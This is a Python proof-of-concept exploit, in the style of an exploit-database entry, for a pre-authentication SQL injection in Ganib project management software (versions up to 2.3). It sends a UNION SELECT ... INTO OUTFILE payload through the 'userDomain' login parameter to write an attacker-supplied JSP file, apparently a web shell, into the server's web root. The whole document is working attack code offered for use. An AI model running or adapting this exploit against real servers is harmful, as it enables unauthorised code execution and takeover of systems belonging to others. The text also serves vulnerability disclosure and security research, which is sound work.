# Exploit title: Ganib 2.x SQLi # Date: 02/02/2014 # Exploit author: drone (@dronesec) # More information: http://hatriot.github.io/blog/2014/02/24/ganib-project-management-2.3-sqli/ # Vendor homepage: http://www.ganib.com/ # Software link: http://downloads.sourceforge.net/project/ganib/Ganib-2.0/Ganib-2.0_with_jre.zip # Version: <= 2.3 # Fixed in: 2.4 # Tested on: Ubuntu 12.04 (apparmor disabled) / WinXP SP3 from argparse import ArgumentParser import sys import string import random import requests """ Ganib 2.0 preauth SQLi PoC @dronesec """ def loadJSP(options): data = '' try: with open(options.jsp) as f: for line in f.readlines(): data += line.replace("\"", "\\\"").replace('\n', '') except Exception, e: print e sys.exit(1) return data def run(options): print '[!] Dropping %s on %s...' % (options.jsp, options.ip) url = "http://{0}:8080/LoginProcessing.jsp".format(options.ip) shell = ''.join(random.choice(string.ascii_lowercase+string.digits) for x in range(5)) exploit = '1 UNION SELECT "{0}","1","2","3" INTO OUTFILE "{1}"' exploit = exploit.format(loadJSP(options), options.path + '/%s.jsp' % shell) data = { "theAction" : "submit", "J_USERNAME" : "test", "J_PASSWORD" : "test", "language" : "en", "remember_checkbox" : "on", "userDomain" : exploit } res = requests.post(url, data=data) if res.status_code is 200: print '[!] Dropped at /{0}.jsp'.format(shell) else: print '[!] Failed to drop JSP (HTTP {0})'.format(res.status_code) def parse(): parser = ArgumentParser() parser.add_argument("-i", help='Server ip address', action='store', dest='ip', required=True) parser.add_argument("-p", help='Writable web path (/var/www/ganib)', dest='path', action='store', default='/var/www/ganib') parser.add_argument("-j", help="JSP to deploy", dest='jsp', action='store') options = parser.parse_args() options.path = options.path if options.path[-1] != '/' else options.path[:-1] return options if __name__ == "__main__": run(parse())